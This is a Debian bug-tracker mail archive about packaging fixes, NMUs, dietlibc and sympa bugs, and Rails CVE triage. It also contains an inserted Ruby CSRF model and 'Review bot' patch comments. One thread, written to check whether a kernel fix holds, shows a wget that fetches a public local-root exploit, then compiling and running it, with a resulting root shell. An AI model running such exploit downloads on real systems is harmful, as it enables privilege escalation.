 Micah, the brown paper bag is all yours ;-)

Right, however I'm afraid your solution to this issue was not the right
one. We actually *do* want the config.ru file owned by the user puppet
because passenger will suid to that user.

Perhaps a better answer would be to do this in a postinst?

micah



pgpLbCJcPPyla.pgp
Description: PGP signature


Bug#574532: libffi-ruby: FTBFS: missing build-dep on ruby1.9.1

2010-03-19 Thread micah anderson

On Thu, 18 Mar 2010 17:06:51 -0400, Aaron M. Ucko u...@debian.org wrote:
 Package: libffi-ruby
 Version: 0.6.2debian-4
 Severity: serious
 Justification: fails to build from source
 
 Hi, Micah!
 
 libffi-ruby fails to build because it tries to run ruby1.9.1 but
 build-depends instead on the old ruby1.9 package:
 
 /usr/bin/ruby1.9.1 debian-setup.rb config --installdirs=std
 make: /usr/bin/ruby1.9.1: Command not found
 make: *** [install/libffi-ruby1.9.1] Error 127
 
 Could you please correct that?

Yes, certainly. thanks for letting me know. I have one other bug I need
to resolve before I can upload, but I expect to do it soon.

 Also, please correct the libffi-ruby binary package's dependency to be
 on libffi-ruby1.8 rather than libruby1.8.  (Likewise for
 libcompass-ruby, libfssm-ruby and librb-inotify-ruby; please let me
 know if you'd like me to file separate reports for them.)

It seems that when you re-use things, you tend to copy all the bugs
too. I'll fix these as well. 

micah






Bug#574142: [DRE-maint] Bug#574142: merb non-DSFG

2010-03-17 Thread micah anderson


 Packaging updated, see changelog: 
   
   
   
 http://github.com/opscode/opscode-packages/tree/master/debian/merb/Debian 
   
   
   
 Cc tfheen for upload sponsorship. 
   

This package is in the debian-ruby-extras team svn repository and was
updated last night to fix this issue. I had uploaded it, but the
orig.tar.gz in the archive didn't match the one that was generated by my
uscan, so it got rejected.

I'm re-doing that upload now.

The difference between the change in the github repository and the svn
repository is pretty minor, they are effectively identical. The only
difference is the change is done in the team's svn repository. It
appears you've done the work on the package in the past, do you have
access to commit to the svn repository?

micah




Bug#558685: some more information and patch on rails issues

2010-01-30 Thread Micah Anderson
* Steffen Joeris steffen.joe...@skolelinux.de [2010-01-30 17:13-0500]:
 Hi Adam
 
 These issues have been assigned CVE ids, see below:
 
 CVE-2009-4214[0]:
 | Cross-site scripting (XSS) vulnerability in the strip_tags function in
 | Ruby on Rails before 2.2.s, and 2.3.x before 2.3.5, allows remote
 | attackers to inject arbitrary web script or HTML via vectors involving
 | non-printing ASCII characters, related to HTML::Tokenizer and
 | actionpack/lib/action_controller/vendor/html-scanner/html/node.rb.
 
 CVE-2008-7248[1]:
 | Ruby on Rails 2.1 before 2.1.3 and 2.2.x before 2.2.2 does not verify
 | tokens for requests with certain content types, which allows remote
 | attackers to bypass cross-site request forgery (CSRF) protection for
 | requests to applications that rely on this protection, as demonstrated
 | using text/plain.
 
 CVE-2008-7248 does not seem to affect lenny since it does not include 'text'
 in the @@unverifiable_types. The upstream patch for this issue is here[2] and
 needs to be included in the sid version.

I can confirm that the lenny version does not include 'text' in the
@@unverifiable_types in the mime_type.rb.

I also can confirm that the sid/squeeze version contains 'text', and
thus they are affected and need updating.

 CVE-2009-4214 affects lenny as well and the upstream patch is here[3], please 
 have a deeper look at that change, because I didn't. :)

I can confirm that this one affects lenny.

It also affects the sid/squeeze version, so this will need to be updated
as well.

 I guess due to CVE-2009-4214 we could fix this via a DSA. When you prepare
 the updated packages for lenny, please also include a fix for CVE-2009-3086[4].

Sounds like a DSA for Lenny which hits both CVEs, as well as an upload
to sid with urgency=high, is the name of the game here.

micah


signature.asc
Description: Digital signature
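To make the CVE-2008-7248 point above concrete: what matters is whether
'text' sits in a list of content types that are exempt from token
verification (the affected versions) or in a list of browser-generated
types that must carry a token (the fix). The following is an added
example, not code from Rails or from this bug report. It is a simplified
model: the Request struct, the MIME table and both type sets are
constructed for the example, and the exact sets Rails used are an
assumption here.

```ruby
require 'set'
require 'securerandom'

# Constructed stand-in for an HTTP request; not Rails' own request object.
Request = Struct.new(:http_method, :content_type, :params, :session_token)

# Hypothetical content-type table (assumption: a small subset of the real mapping).
MIME_SYMBOLS = {
  'text/plain'                        => :text,
  'text/html'                         => :html,
  'application/x-www-form-urlencoded' => :url_encoded_form,
  'multipart/form-data'               => :multipart_form,
  'application/json'                  => :json,
  'application/xml'                   => :xml,
}.freeze

# Strip parameters such as "; charset=utf-8" and map to a symbol.
def mime_symbol(content_type)
  base = content_type.to_s.split(';').first.to_s.strip.downcase
  MIME_SYMBOLS.fetch(base, :unknown)
end

# Affected logic (blacklist): any type NOT in this set has its token checked.
# Having :text in here is the condition the report above identifies.
UNVERIFIABLE_TYPES = Set[:text, :json, :xml].freeze

def verifiable_blacklist?(req)
  return false if %w[GET HEAD].include?(req.http_method)
  !UNVERIFIABLE_TYPES.include?(mime_symbol(req.content_type))
end

# Fixed logic (whitelist): only types a browser can submit cross-site from a
# plain HTML form get their token checked. text/plain belongs here because a
# form with enctype="text/plain" can be auto-submitted from another origin.
BROWSER_GENERATED_TYPES = Set[:html, :url_encoded_form, :multipart_form, :text].freeze

def verifiable_whitelist?(req)
  return false if %w[GET HEAD].include?(req.http_method)
  BROWSER_GENERATED_TYPES.include?(mime_symbol(req.content_type))
end

# Constant-shape token comparison against the session's token.
def token_ok?(req)
  token = req.params['authenticity_token']
  !token.nil? && token == req.session_token
end

# Decide a request's fate under one policy (:verifiable_blacklist? or
# :verifiable_whitelist?). Returns :allowed or :rejected.
def handle(req, policy)
  return :allowed unless send(policy, req)
  token_ok?(req) ? :allowed : :rejected
end

if __FILE__ == $PROGRAM_NAME
  token  = SecureRandom.hex(16)
  forged = Request.new('POST', 'text/plain', {}, token) # cross-site form, no token
  legit  = Request.new('POST', 'application/x-www-form-urlencoded',
                       { 'authenticity_token' => token }, token)
  %i[verifiable_blacklist? verifiable_whitelist?].each do |policy|
    puts "#{policy}: forged=#{handle(forged, policy)} legit=#{handle(legit, policy)}"
  end
end
```

Under the blacklist a text/plain POST with no token is :allowed (the
bypass); under the whitelist it is :rejected. A JSON body without a token
is allowed under both, which is the intended design, since a plain HTML
form cannot produce an application/json body.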


Bug#474087: Tested and NMU'ing 2

2010-01-30 Thread micah anderson
On Sun, 31 Jan 2010 01:32:01 +0100, Sebastian Harl tok...@debian.org wrote:
 Hi,
 
 On Sat, Jan 30, 2010 at 07:23:35PM -0500, micah wrote:
  As part of the fun at the NYC BSP, I decided to try and fix this issue.
  
  I built this package, with the patch that Simon McVittie submitted. I
  then asked someone to test this on a system with ipmi and it seemed to
  work fine:
 
 Side note: The pkg-config commands are, of course, unrelated to IPMI
 being available on some system. In my earlier E-mail, I was referring to
 testing the OpenIPMI tools included in the package.

Ah, I didn't understand that. I don't actually have any idea how to test
the ipmi tools included in the package. I'm happy to arrange a test or
two to make sure that they are working as expected, if you can tell me
what I should run?

  aromatase:/var/temp# pkg-config --libs OpenIPMIpthread -pthread 
  -lOpenIPMIpthread -lOpenIPMIutils -lOpenIPMI
 
 I suppose, you're missing a newline here ;-)

Sorry, the missing line is just the:
aromatase:/var/temp#

Micah




Bug#566913: 566913: twisted-doc: recommends obsolete twisted-doc-api

2010-01-30 Thread micah anderson

As part of the BSP party here in NYC, I'm NMU'ing this, uploading to the
3-day DELAYED queue with this patch (with only a minor change in the
changelog to include the Closes line for this bug).

thanks!
micah




Bug#552825: klibc: FTBFS: usr/kinit/nfsmount/mount.c:179: error: 'MNTPROC_MNT' undeclared (first use in this function)

2010-01-30 Thread Micah Anderson

Hi maks!

* maximilian attems m...@stro.at [2010-01-31 04:44-0500]:
 On Wed, Oct 28, 2009 at 11:41:14AM +0100, Lucas Nussbaum wrote:
  Source: klibc
  Version: 1.5.15-1
...

  During a rebuild of all packages in sid, your package failed to build on
  amd64.
  
  Relevant part:
 gcc -Wp,-MD,usr/kinit/nfsmount/.mount.o.d   -nostdinc -iwithprefix 
   include -Iusr/include/arch/x86_64 -Iusr/include/bits64 
   -Iusr/klibc/../include -Iusr/include -Ilinux/include   -D__KLIBC__=1 
   -D__KLIBC_MINOR__=5 -D_BITSIZE=64  -fno-stack-protector -m64  -Os 
   -fno-asynchronous-unwind-tables -fomit-frame-pointer -falign-functions=1 
   -falign-jumps=1 -falign-loops=1 -W -Wall -Wno-sign-compare 
   -Wno-unused-parameter   -c -o usr/kinit/nfsmount/mount.o 
   usr/kinit/nfsmount/mount.c
   usr/kinit/nfsmount/mount.c: In function 'mount_call':
   usr/kinit/nfsmount/mount.c:179: error: 'MNTPROC_MNT' undeclared (first 
   use in this function)

...

  The full build log is available from:
 
  http://people.debian.org/~lucas/logs/2009/10/28/klibc_1.5.15-1_lsid64.buildlog
  
 
 known, have a local patch for that, need to push upstream
 to also get a reall release of latest git, thanks.

Just poking you on this... your last email was from October, any
progress on this RC bug?

thx!
micah




Bug#563380: [DRE-maint] Bug#563380: libgpgme-ruby1.8: /usr/lib/ruby/1.8/gpgme.rb:898:in `new': Unknown error code (GPGME::Error)

2010-01-17 Thread micah anderson
On Sun, 17 Jan 2010 19:56:47 +0100, Jérémy Bobbio lu...@debian.org wrote:
 On Sat, Jan 02, 2010 at 01:45:50PM +0100, Jérémy Bobbio wrote:
  The version of libgpgme-ruby1.8 currently in Debian is not compatible with 
  the
  version of libgpgme actually in Debian.
  […]
  This problem breaks schleuder in sid, so a fix or an updated version
  would be very much welcome.
 
 Ping?

 Should I do an NMU?

Hey Jérémy!

Although there are specific maintainers for ruby libraries maintained
under the pkg-ruby-extras team (and libgpgme-ruby seems to be maintained
by Rudi Cilibrasi cilib...@debian.org), I think that most everyone has
had other team members do work on others' packages, and I suspect that
one should assume a low-threshold NMU policy in general.

It would be better if you joined the team and updated the package via
the subversion repository, it would reduce the work on everyone in
general, however I would completely understand if you didn't feel like
joining yet another team, and it's certainly not reasonable to ask that
all users of a package be part of the maintenance team :)

micah





Bug#544756: [Secure-testing-team] Bug#544756: linux-image-2.6.26-2-686: Kernel still vulnerable by dsa-1862

2009-09-03 Thread Micah Anderson
* Christoph Siess c...@geekhost.info [2009-09-02 14:57-0400]:
 Package: linux-image-2.6.26-2-686
 Version: 2.6.26-17lenny2
 Severity: critical
 Tags: security
 Justification: root security hole
 
 
 Hi,
 
 according to http://www.debian.org/security/2009/dsa-1862 this Version of the 
 2.6.26-2 Kernel should 
 not be vulnerable to CVE-2009-2692.
 Unfortunately I'm still able to break my system:
 c...@server:~$ gcc exploit.c -o exploit
 c...@server:~$ ./exploit
 sh-3.2# id
 uid=0(root) gid=0(root) groups=115(wheel),1000(chs)
 
 I got the exploit from http://www.risesecurity.org/exploits/linux-sendpage.c
 
 Correct my if I got something wrong, but according to my understanding this 
 shouldn't be possible 
 with version 2.6.26-17lenny2.


I'm afraid this doesn't work on any of the systems I am running
2.6.26-17lenny2 on:

mi...@tern:~$ wget http://www.risesecurity.org/exploits/linux-sendpage.c
Saving to: `linux-sendpage.c'
100%[]
2009-09-03 19:01:43 (24.2 KB/s) - `linux-sendpage.c' saved [9380/9380]
mi...@tern:~$ gcc linux-sendpage.c -o exploit
mi...@tern:~$ ./exploit 
sh-3.2$ id
uid=1001(micah) gid=1007(micah)
groups=4(adm),20(dialout),33(www-data),100(users),1007(micah)

micah





Bug#527872: Me too

2009-07-20 Thread Micah Anderson

I just upgraded to awesome 3.3.1-1 and because it seemed like this was
fixed, I decided to try a dbus restart, and was sad to find out it
actually wasn't. So this is a me too.

micah




Bug#536452: rpm: please build-depend on libbeecrypt-dev

2009-07-09 Thread Micah Anderson

Hi Aníbal!

* Aníbal Monsalve Salazar ani...@debian.org [2009-07-09 21:20-0400]:
 util-vserver build-depends on libbeecrypt6-dev which will be removed
 from unstable in the near future.

Ok, thanks for the warning!

 The current beecrypt in unstable ships libbeecrypt-dev instead of
 libbeecrypt6-dev.

Hasn't hit my mirror yet, but I'll update the debian/control so the next
upload will have it!

Micah




Bug#527065: util-vserver: diff for NMU version 0.30.216~r2772-6.1

2009-06-14 Thread Micah Anderson

Hi Andrew,

* Andrew Lee and...@linux.org.tw [2009-06-13 02:40-0400]:
 -BEGIN PGP SIGNED MESSAGE-
 Hash: SHA1
 
 tags 527065 +patch
 thanks
 
 Dear maintainer,
 
 I've prepared an NMU for util-vserver (versioned as 0.30.216~r2772-6.1).
 And it will be uploaded to DELAYED/02. Please free to tell me if I should
 delay it longer.

I appreciate the help with the package, although typically a NMU is done
after a patch is not being applied, so sending a patch and doing a 2-day
NMU at the same time is a little aggressive. I'm also wondering how you
can do this NMU because as far as I can tell you aren't yet a DD :)

I have been working on a new version of util-vserver to upload, with a
newer snapshot, so I was delaying this fix until that was
finished. However I can upload this fix to resolve the RC bug.

In any case, what would be even better than doing NMUs would be if you
would join the Alioth team and help with the util-vserver packaging
effort, it's an open team, although nobody has helped on it so far and I
would appreciate the help!

Micah




Bug#527065: util-vserver: diff for NMU version 0.30.216~r2772-6.1

2009-06-14 Thread Micah Anderson
* Andrew Lee and...@linux.org.tw [2009-06-14 12:57-0400]:
 Hi Micah,
 
 Micah Anderson wrote:
  Hi Andrew,
  I appreciate the help with the package, although typically a NMU is done
  after a patch is not being applied, so sending a patch and doing a 2-day
  NMU at the same time is a little aggressive. I'm also wondering how you
  can do this NMU because as far as I can tell you aren't yet a DD :)
 
 Sorry for the unclear message. I did not mean to be aggressive. I just
 reproduced what other DDs do for NMUs. Please let me know the proper way if I
 did this wrong. I guess you may have smelled that I am in the NM process so that
 my AM would sponsor the upload. :)

No problem at all. The bug is a RC bug and I have not reacted to it in a
timely manner. Doing the NMU with a 2-day delay is fine, for this
bug. 

  I have been working on a new version of util-vserver to upload, with a
  newer snapshot, so I was delaying this fix until that was
  finished. However I can upload this fix to resolve the RC bug.
 
 I see. My intention was to solve the RC bug for the next point release. It
 would be great if you accept this NMU for me.

I've uploaded a new package with that fix, thanks for sending the patch!

  In any case, what would be even better than doing NMUs would be if you
  would join the Alioth team and help with the util-vserver packaging
  effort, its an open team, although nobody has helped on it so far and I
  would appreciate the help!
 
 Thanks for your invitation. I've sent the request on Alioth. Please
 update me for the new version of util-vserver with a newer snapshot via
 alioth.

I have accepted your request on Alioth. 

micah




Bug#526173: clamav-milter: initscript fails to start, options are deprecated

2009-04-29 Thread Micah Anderson
Package: clamav-milter
Version: 0.95.1+dfsg-0volatile2
Severity: grave
Justification: renders package unusable

New rewrite of clamav-milter fails to hurl, instead of starting, dry heaves.

First all previous command-line options seem to have mysteriously
disappeared and no documentation about where they went, or what they
should be replaced by in the config file. Pretty much any command-line
option causes milter to not start.

Second, initscript uses command-line options, so milter will not start
without editing initscript to deal with --pidfile $PIDFILE $SOCKET in
two locations.

micah

-- System Information:
Debian Release: squeeze/sid
  APT prefers unstable
  APT policy: (500, 'unstable'), (1, 'experimental')
Architecture: i386 (i686)

Kernel: Linux 2.6.26-1-vserver-686 (SMP w/2 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash






Bug#518198: [debpool] Bug#518198: One other missing dependency

2009-03-05 Thread Micah Anderson
* Magnus Holmgren holmg...@debian.org [2009-03-05 14:49-0500]:
 On onsdagen den 4 mars 2009, Micah Anderson wrote:
  The list of missing package dependencies is actually:
 
  libdigest-sha-perl, libarchive-tar-perl and liblinux-inotify2-perl
 
 I never got around to looking at Andres's changes, but I thought the 
 intention 
 was that at least libdigest-sha-perl and liblinux-inotify2-perl would be 
 optional?

When I ran debpool it complained about those missing perl libraries,
perhaps they are optional, but the complaints made me think otherwise.

micah






Bug#518198: debpool: Missing dependencies

2009-03-04 Thread Micah Anderson
Package: debpool
Version: 0.5.1
Severity: grave
Justification: renders package unusable

Missing dependencies on: libarchive-tar-perl and liblinux-inotify2-perl

micah


-- System Information:
Debian Release: 5.0
  APT prefers unstable
  APT policy: (500, 'unstable'), (1, 'experimental')
Architecture: i386 (i686)

Kernel: Linux 2.6.26-1-vserver-686 (SMP w/2 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash






Bug#518198: One other missing dependency

2009-03-04 Thread Micah Anderson
The list of missing package dependencies is actually:

libdigest-sha-perl, libarchive-tar-perl and liblinux-inotify2-perl  




Bug#508397: dietlibc: Undefined symbol: umount2 on alpha and ia64

2008-12-11 Thread Micah Anderson
* Gerrit Pape [EMAIL PROTECTED] [2008-12-11 04:30-0500]:
 On Wed, Dec 10, 2008 at 04:11:14PM -0500, Micah Anderson wrote:
  As it turns out dietlibc-0.31 doesn't properly define the umount2
  symbols on two architectures: alpha and ia64. This sadly results in a
  build regression for util-vserver, which used to build on these
  architectures, but is refusing to build now. This is holding back an
  important transition of the package into Lenny. In other words, if this
  package cannot be built on alpha/ia64, then it will not be usable for
  most cases in Lenny due to the previous version not functioning
  properly in two important respects.
 
 Hi, I'm surprised.  Not that I question that there's possibly a bug, but
 version 0.31-1 of dietlibc is in the archive since more than one year.
 I wonder why the util-vserver package needs such changes that late in
 the Debian release cycle.

Yeah, I was surprised too. However, it goes far up the chain... the
newer kernels brought in some virtualization namespace changes, which
only have begun to appear in the kernels that have now transitioned into
Lenny. These new changes mean that util-vserver has to change the way it
deals with unmounting and cleanup in the guest because the chroot
barrier is being faded out in favor of the new namespaces and
pivot_root.

 Anyway, I'm sorry, I currently don't have the time to look at it or even
 upload a new package, please NMU if you think that's the right thing.

Ok, I've been recruiting testers on different arches and just have mips,
arm and sparc left to test before we are certain that the change works
right. 

thanks!
micah




Bug#508397: dietlibc: Undefined symbol: umount2 on alpha and ia64

2008-12-10 Thread Micah Anderson
Package: dietlibc
Version: 0.31-1
Severity: grave
Tags: patch
Justification: renders package unusable

Hi,

As it turns out dietlibc-0.31 doesn't properly define the umount2
symbols on two architectures: alpha and ia64. This sadly results in a
build regression for util-vserver, which used to build on these
architectures, but is refusing to build now. This is holding back an
important transition of the package into Lenny. In other words, if this
package cannot be built on alpha/ia64, then it will not be usable for
most cases in Lenny due to the previous version not functioning
properly in two important respects.

The buildlogs which demonstrate this problem are:

alpha: 
http://buildd.debian.org/fetch.cgi?pkg=util-vserverver=0.30.216%7Er2772-5arch=alphastamp=1227907425file=log
ia64: 
http://buildd.debian.org/fetch.cgi?pkg=util-vserverver=0.30.216%7Er2772-5arch=ia64stamp=1227907303file=log

both complain, rightly:

diet -Os gcc -Wall -g -O2 -std=c99 -Wall -pedantic -W -funit-at-a-time
 -o src/exec-remount src/exec-remount.o lib/libvserver.a
 src/exec-remount.o: In function `main':
 /build/buildd/util-vserver-0.30.216~r2772/src/exec-remount.c:110:
 undefined reference to `umount2' collect2: ld returned 1 exit status

The solution to this is the attached patch, I believe.

micah



-- System Information:
Debian Release: lenny/sid
  APT prefers unstable
  APT policy: (500, 'unstable'), (1, 'experimental')
Architecture: i386 (i686)

Kernel: Linux 2.6.26-1-vserver-686 (SMP w/2 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash

dietlibc depends on no packages.

dietlibc recommends no packages.

Versions of packages dietlibc suggests:
ii  dietlibc-dev  0.31-1 diet libc - a libc optimized for s
pn  dietlibc-doc  none (no description available)

-- no debconf information
--- a/syscalls.s/umount.S	9 Jan 2001 17:57:49 -	1.1
+++ b/syscalls.s/umount.S	10 Dec 2008 20:21:33 -
@@ -1,3 +1,7 @@
 #include syscalls.h
 
+#if defined(__NR_oldumount)  defined(__NR_umount)
+syscall(oldumount,umount)
+#else
 syscall(umount,umount)
+#endif
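Review bot: the guard `#if defined(__NR_oldumount)  defined(__NR_umount)` has no operator between the two `defined()` tests; as shown it is not a valid preprocessor expression and the assembler pass will fail on it, so it needs `&&` (this may be a rendering artifact of the mail, but it must be checked before the patch is applied). The intent, mapping the `umount` symbol onto `__NR_oldumount` wherever both numbers exist, is otherwise clear; a one-line comment naming the architectures this applies to (the report cites alpha and ia64) would help the next reader understand why plain `umount` is not used there.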
--- a/syscalls.s/umount2.S	4 Jan 2003 22:21:48 -	1.2
+++ b/syscalls.s/umount2.S	10 Dec 2008 20:21:33 -
@@ -1,5 +1,7 @@
 #include syscalls.h
 
-#ifdef __NR_umount2
+#if defined(__NR_umount2)
 syscall(umount2,umount2)
+#elif defined(__NR_oldumount)  defined(__NR_umount)
+syscall(umount,umount2)
 #endif
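Review bot: the same missing `&&` appears in `#elif defined(__NR_oldumount)  defined(__NR_umount)` and needs the same fix. This hunk also encodes the assumption that whenever `__NR_oldumount` exists, `__NR_umount` is the two-argument variant, and the first hunk relies on the identical assumption, so the two must be kept in step if either is changed later. If neither branch matches, no `umount2` symbol is emitted at all, which is the same silent behaviour that produced the undefined reference to `umount2` quoted in the report; consider adding an `#else` with `#error` (or at least a comment) so a missing syscall number surfaces when dietlibc is built rather than when a dependent package links.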


Bug#506949: util-vserver: /proc Permisson denied errors in vservers (e.g. openssh-server, postfix unusable)

2008-11-26 Thread Micah Anderson
* Florian Sievers [EMAIL PROTECTED] [2008-11-26 05:35-0500]:
 Package: util-vserver
 Version: 0.30.216~r2772-4
 Severity: critical
 Justification: breaks unrelated software
 
 *** Please type your report below this line ***
 After updating to version 0.30.216~r2772-4 services like openssh or
 postfix
 stopped working. This is the output from the auth.log form one of my
 vservers:
 
 ---Debug output from auth.log---
 Nov 25 11:39:25 web sshd[13098]: debug1: rexec start in 4 out 4 newsock
 4 pipe 6 sock 7
 Nov 25 11:39:25 web sshd[13091]: debug1: Forked child 13098.
 Nov 25 11:39:25 web sshd[13098]: error writing /proc/self/oom_adj:
 Permission denied
 Nov 25 11:39:25 web sshd[13098]: debug1: inetd sockets after dupping: 3,
 3
 Nov 25 11:39:25 web sshd[13098]: Connection from 192.168.0.140 port
 52076
 Nov 25 11:39:25 web sshd[13098]: debug1: Client protocol version 2.0;
 client software version OpenSSH_5.1p1 Debian-3
 Nov 25 11:39:25 web sshd[13098]: debug1: match: OpenSSH_5.1p1 Debian-3
 pat OpenSSH*
 Nov 25 11:39:25 web sshd[13098]: debug1: Enabling compatibility mode for
 protocol 2.0
 Nov 25 11:39:25 web sshd[13098]: debug1: Local version string
 SSH-2.0-OpenSSH_5.1p1 Debian-3
 Nov 25 11:39:25 web sshd[13099]: fatal: chroot(/var/run/sshd):
 Operation not permitted
 Nov 25 11:39:25 web sshd[13099]: debug1: do_cleanup
 Nov 25 11:39:25 web sshd[13098]: debug1: do_cleanup
 --End of debug output--
 
 Same problems with postfix and dovecot. The chroot command on the
 console fails
 too.

For sshd, this appears to be because of UsePrivilegeSeparation being
set to 'yes' in the sshd config, which is the debian default along with
SYS_CHROOT bcapability restricted by default in -4.

micah





Bug#506949: util-vserver: /proc Permisson denied errors in vservers (e.g. openssh-server, postfix unusable)

2008-11-26 Thread Micah Anderson

What kernel version and arch are you running? It looks like i686 from
your bug report, but please verify.

I'm on i686 with 2.6.26, and I am not able to replicate this.

Micah




Bug#501154: sympa: not supported by perl version in Lenny

2008-10-14 Thread Micah Anderson
 Micah Anderson a écrit :
 Package: sympa
 Version: 5.3.4-5.2
 Severity: grave
 Justification: renders package unusable

 After installation of sympa, it tries to start the daemons, and the
 following errors are printed out for each of the daemons:

 Setting up sympa (5.3.4-5.2) ...
 Starting Sympa mailing list manager: sympaPrototype mismatch: sub 
 Lock::LOCK_SH () vs none at /usr/lib/sympa/bin/Lock.pm line 38.
 Constant subroutine LOCK_SH redefined at /usr/lib/sympa/bin/Lock.pm line 38.
 Prototype mismatch: sub Lock::LOCK_EX () vs none at 
 /usr/lib/sympa/bin/Lock.pm line 39.
 Constant subroutine LOCK_EX redefined at /usr/lib/sympa/bin/Lock.pm line 39.
 Prototype mismatch: sub Lock::LOCK_NB () vs none at 
 /usr/lib/sympa/bin/Lock.pm line 40.
 Constant subroutine LOCK_NB redefined at /usr/lib/sympa/bin/Lock.pm line 40.
 $* is no longer supported at /usr/lib/sympa/bin/sympa.pl line 162.

 I made these go away by commenting out:

 #sub LOCK_SH {1};
 #sub LOCK_EX {2};
 #sub LOCK_NB {4};

 in Lock.pm on line 38, I don't know if this causes any problems 

* Olivier Salaün [EMAIL PROTECTED] [2008-10-06 03:19-0400]:
 The first problem (Constant subroutine LOCK_XX redefined) has already  
 been fixed *4 months ago* in the development trunk as well as in the 5.4  
 stable branch, see  
 http://sourcesup.cru.fr/cgi/viewvc.cgi/branches/sympa-5.4-branch/src/Lock.pm?r1=4922r2=5048

Great! I should have checked this before reporting it upstream.

 The other error:

 $* is no longer supported at /usr/lib/sympa/bin/parser.pl line 63.  
 
  Is not something I 
 know how to fix, however I believe that this was
 deprecated by perl 5.10 as perldoc perlvar says:

[snip]

 Which makes me think that maybe this should be changed to use the /m
 modifier, but I don't know what this particular function in sympa does.

* Olivier Salaün [EMAIL PROTECTED] [2008-10-06 03:19-0400]:
 You're right, we had already fixed similar code earlier but obviously  
 forgot this one. We'll fix the problem ASAP in both trunk and 5.4 branch.
 If you don't mind, could you add an entry in Sympa's own tracking system  
 : https://sourcesup.cru.fr/tracker/?group_id=23

Certainly, I'll add something right now. Sorry for the delay.

Micah




Bug#501154: sympa: not supported by perl version in Lenny

2008-10-14 Thread Micah Anderson
* Olivier Berger [EMAIL PROTECTED] [2008-10-06 04:45-0400]:
 Le lundi 06 octobre 2008 à 12:17 +0200, Olivier Salaün a écrit :
  Micah Anderson a écrit :
  
   After installation of sympa, it tries to start the daemons, and the
   following errors are printed out for each of the daemons:
  
   Setting up sympa (5.3.4-5.2) ...
   Starting Sympa mailing list manager: sympaPrototype mismatch: sub 
   Lock::LOCK_SH () vs none at /usr/lib/sympa/bin/Lock.pm line 38.
 
 SNIP
 
 FYI, I have merged with bug #483891 which had been filed already for
 that problem.

My apologies, I should have looked at older bugs to see if it was
already filed. 

   in Lock.pm on line 38, I don't know if this causes any problems 
  The first problem (Constant subroutine LOCK_XX redefined) has already 
  been fixed *4 months ago* in the development trunk as well as in the 5.4 
  stable branch, see 
  http://sourcesup.cru.fr/cgi/viewvc.cgi/branches/sympa-5.4-branch/src/Lock.pm?r1=4922r2=5048
 
 And the corresponding bug was tagged as forwarded to
 http://sourcesup.cru.fr/tracker/index.php?func=detailaid=3953group_id=23atid=167
  in http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=483891#11 ... ;-)

Great, and it looks like a new version of the package was uploaded to
Debian with these patches applied.

However, to get these into Lenny, a release exception will need to be
requested through debian-release.

   The other error:
  
   $* is no longer supported at /usr/lib/sympa/bin/parser.pl line 63.
 

* Olivier Berger [EMAIL PROTECTED] [2008-10-06 04:45-0400]:
  You're right, we had already fixed similar code earlier but obviously 
  forgot this one. We'll fix the problem ASAP in both trunk and 5.4 branch.
  If you don't mind, could you add an entry in Sympa's own tracking system 
  : https://sourcesup.cru.fr/tracker/?group_id=23
  Thanks.
 
 I'm not sure, but maybe this needs reopening
 http://sourcesup.cru.fr/tracker/index.php?func=detailaid=3953group_id=23atid=167
  instead ?

This is the same URL as above (about Lock.pm), but this second issue
has nothing to do with Lock.pm, but is about the use of '$*', so I
think I'll open another bug.

Micah





Bug#501605: I cannot reproduce this

2008-10-08 Thread Micah Anderson
tag 501605 + unreproducible
thanks

I've just attempted to do an install of -6 myself and I did not get this
error:

Setting up sympa (5.3.4-6) ...
Configuration file read, default log level  0
Sympa 5.3.4 started
Conf::checkfiles() creating spool /var/spool/sympa/automatic
Conf::checkfiles() creating spool /var/spool/sympa/topic
Conf::checkfiles() creating spool /var/spool/sympa/bounce
Conf::checkfiles() creating spool /var/spool/sympa/subscribe
Conf::checkfiles() creating spool /var/spool/sympa/distribute
Conf::checkfiles() creating spool /var/spool/sympa/msg/bad
Conf::checkfiles() creating spool /var/spool/sympa/distribute/bad
Conf::checkfiles() creating spool /var/spool/sympa/automatic/bad
Conf::checkfiles() Updating static CSS file
/var/lib/sympa/static_content/css/style.css ; previous file renamed
Conf::checkfiles() Updating static CSS file
/var/lib/sympa/static_content/css/print.css ; previous file renamed
Conf::checkfiles() Updating static CSS file
/var/lib/sympa/static_content/css/fullPage.css ; previous file renamed
Conf::checkfiles() Updating static CSS file
/var/lib/sympa/static_content/css/print-preview.css ; previous file
renamed
Language::SetLang() Language::SetLang(), missing locale parameter
Upgrade process...
Upgrading from  to 5.3.4...
Upgrade::upgrade() Upgrade::upgrade(, 5.3.4)
Upgrade::upgrade() Rebuilding config.bin files for ALL lists...it may
take a while...
Upgrade::upgrade() Rebuilding the admin_table...
Upgrade::upgrade() Migrating templates to TT2 format...
Upgrade::upgrade() Rebuilding web archives...
Upgrade::upgrade() Initializing the new admin_table...
Upgrade::upgrade() Old web templates HTML structure is not compliant
with latest ones.
Upgrade::upgrade() Moving old-style web templates out of the
include_path...
Upgrade::upgrade() Cleaning buggy list config files...
Upgrade::upgrade() Rename archives/log. files...
Upgrade::upgrade() Updating the new robot_subscriber and robot_admin  Db
fields...
Upgrade::upgrade() Renaming web archive directories with the list
domain...
Upgrade::upgrade() Updating subscribed field of the subscriber table...
Upgrade::upgrade() 0 rows have been updated
Upgrade::upgrade() Updating subscribed field of the subscriber table...
Upgrade::upgrade() 0 rows have been updated
Upgrade::upgrade() Updating subscribed field of the subscriber table...
Upgrade::upgrade() 0 rows have been updated
Upgrade::upgrade() Updating subscribed field of the subscriber table...
Upgrade::upgrade() 0 rows have been updated
Upgrade::upgrade() Renaming bounce sub-directories adding list domain...
Upgrade::upgrade() Update lists config using include_list parameter...
Upgrade::upgrade() Looking for customized mhonarc-ressources.tt2
files...
Upgrade::upgrade() Rebuilding web archives...
Upgrade::upgrade() Q-Encoding web documents filenames...
Upgrade::upgrade() Encoding all custom files to UTF-8...
Upgrade::upgrade() 0 files have been modified
Upgrade process finished.
Starting Sympa mailing list manager: sympa.
Starting Sympa mailing list archive manager: archived.
Starting Sympa task manager: task_manager.
Starting Sympa bounce manager: bounced.
Reading package lists... Done 
Building dependency tree   
